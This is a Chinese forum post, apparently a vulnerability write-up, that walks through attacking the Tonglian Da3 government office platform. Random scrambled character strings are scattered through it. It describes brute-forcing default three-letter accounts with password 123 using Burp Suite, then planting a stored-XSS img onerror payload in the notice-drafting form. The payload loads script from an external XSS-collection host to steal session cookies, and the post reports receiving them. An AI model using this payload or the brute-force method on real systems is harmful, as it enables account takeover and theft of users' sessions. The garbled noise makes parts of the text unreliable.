( Q7 Q3 r/ i0 E
+ l8 ?5 |3 s( w1 \1 z( O1 k 同联Da3协同办公平台后台通用储存型xss漏洞0 |2 x* V2 d( G1 m8 |
+ ]5 B+ H6 d/ l9 J g' B2 Q& ]* u- A! v8 }& k3 x
平台简介:
$ v8 d" ?) z8 j) z
/ ^5 H: d$ b' p% W0 ~$ K
/ J9 c6 k$ k Q q
) y) }6 w% U3 z
- }/ K. O5 Z" u0 V/ t; A8 ]: b
2 Y1 T7 ]3 Y( A+ r% z1 m
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
. n/ z6 h/ ^+ h- {: s3 B. }! Y
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* ] m9 z" ~ u1 |/ e# v同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!* w7 r& E* ^0 h" A
0 M1 d! ^- M+ M9 f5 L" ^" A$ {
4 @. o! h6 `0 n9 B. G0 }
: b3 t `& s2 u+ j6 s4 Y+ P
k0 Z9 W% s6 Q' A2 Y
F5 [8 H# J5 n' v 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:9 A4 Y" H* V& v6 T/ w2 f, J
* z% \; A; f( ?+ {3 h
4 H9 K9 A2 ?) j7 k5 G+ k N$ z* c9 D7 c
9 _1 M& k( f" a" j0 T. V0 x, r
; E- Y6 b1 C- q8 D, s1 U, r r http://1.1.1.1:7197/cap-aco/#(案例2-)) }! z6 @. E" {" |+ o z( M1 j
7 ?3 I% N4 t3 W * p3 F* J$ C3 l2 B0 H
http://www.XXOO.com (案例1-官网网站)
) \) b1 D1 q2 s7 J2 x5 P
) g( \+ H" Y7 Z 1 c% Q7 I6 G% H1 a% s8 c& a
漏洞详情:0 {! f+ |" b4 y, ^% z3 V4 ~
0 N* y5 J; b/ d5 w) k1 ~* X4 g . D0 f5 \( [4 ?$ A% ~
案例一、
6 C( v: S4 J6 A5 E: Z. M+ R& i
2 u( P' J/ [ y0 [* G* e- p
- W! e5 P' Z0 y4 ^3 L* `
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
7 M; q2 F9 K1 J
i# o" ]# U, g+ ~! J
, p4 d, g; I( D 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:6 i+ \* q& j3 P1 a/ d+ P- e% P$ i
" Z+ n2 \. y. G# F8 B
& i' ^! l$ H) L) i
3 I* `; v& l3 G. t
1 ~. i$ X- ^" h! L k0 t* y3 O - s6 U/ c2 x- u( T2 H7 X
8 ]4 g. N3 J9 f* @% e
2 O" S, }0 [- }1 r) h3 U& R
* C& V# P# t3 [6 F$ V
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ; C$ E" V% v2 U. J
6 V5 i! H; m N+ m
6 \& L4 L9 i3 ~1 @8 H) m3 X
0 o3 U: g$ a, M
5 Y1 K2 _0 Z1 M& n1 X $ N9 e0 } s9 k1 l
: ]5 T* P3 D# ~! Y# v2 c, n$ _
' W. q0 a5 p `& H# @! [9 I 3 ?* d# E3 K% q( K7 B8 h
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 + l9 S: p* \% J( B* w, s
7 V- N$ _- B& o' y/ | " n0 W' v0 W/ }" E' B4 b8 D
5 `% E, [0 Y3 v# ]) K2 N, R1 g
9 `: `9 r0 C9 `; i
% c8 Q# [0 Y/ A- M H* Q: c# m <img src=x
- f5 ?6 F3 c# D4 Donerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: & H* T1 t9 B; g) e9 y4 i
1 U* C- n0 m; k6 k! ~
/ S8 m* A8 F3 ^. I1 N! u6 y 
" M4 G c+ ^0 o5 _+ O
! j) m2 Z8 z7 U
5 q* _1 X6 Y5 O: \2 T" w! [- X 然后发送,接收cookie如图: 7 I/ K* p) O6 v
/ T" b+ l4 G9 b, R6 T! A {
d* y- j4 b- H ~
! k6 Y! c4 s$ k/ N, b
- u' e- d2 T0 }) ]7 Y# T3 V9 v & B4 C0 U: l1 E3 J5 ]6 I4 ]9 y
' [6 ~# P8 ]- q* o& [1 g
0 j( y! d- _" ^; B' ~
8 n* t8 p5 n. a 7 e7 U" U$ ~4 e5 `( c3 v4 p
} r2 h3 K# p " G/ e- n2 b) n9 l, H u
v1 L7 [7 X- b2 C7 f
9 O& p/ D \6 V
! l6 i$ H- W9 G G. _5 A. N
9 w1 Y. E9 m$ F
: j- g/ Y5 Q5 E9 _% s$ q2 g
% y+ t; }* T9 S 
) H- Q; o; N5 x& v: g
( M3 e! | R ?# z8 G4 \
8 L: t0 }7 e( y" N" L$ h) k/ E% k * R8 q& Y' Y( q- U
5 m# k* z) Y4 \( l5 _2 D- r6 F6 G
4 M( S' R6 H* ]% U2 G
案例2、 4 I( v" C$ N( a2 T1 F$ p
& A$ E; H7 U$ \
, Y- Z) Z$ W$ `9 I( ?" N6 F7 ]5 @
前面步骤都一样,下面看效果图:
3 c- T" I$ {0 j
- f& d, f6 ~% x6 D9 f" Q6 b: V! |
6 x. E) z' G1 O8 J3 D 
' Z' I- @- a5 @. Q
3 b" j8 _, d! Q, Q2 n' ^ 0 t0 T: d: o4 r$ Z9 w* z. o
! F. ]5 y: l$ f/ B
- P X% q3 C7 P. ^' W0 C) n
% q% ?5 ^" L3 [# ?6 U0 Q$ X# M* U7 x
: y0 ^1 d% n* ^1 z
( W% v. \2 A7 S) r
% A& J4 s* _! U, @9 t
. V h" Z" J i z8 s! Q& z8 S# T
- J, [: d# _+ a+ V$ l$ f
. |6 v, H5 Q4 s* } 
9 P( B2 y Y/ m2 r
" ?: e. a* ~6 i6 {% }/ y + K2 p8 h& ?, l$ A! b* y) K
2 X. B: t |9 u. }7 i o
) S/ \) G5 z- P$ \; ^+ e k3 @. X( A
. ]3 J1 ^7 C' h8 U, w
' m; N5 d" Q$ N8 C/ Q& O
7 B& @5 ? m& _. X4 T* n3 Q
# u# G& ?& m# g; {) n# F4 J
8 o1 z# s7 e$ @$ y7 F; E3 A4 S( W
3 p* F0 q d- E& Y! j: }$ l
) j) E( J3 Q2 H' S: N
9 X3 a# ?" s( o( @8 _- x1 o0 r
! P* s7 F! u i1 \5 S- B% [ 
发表于 2018-10-20 20:14:15
收藏
支持
反对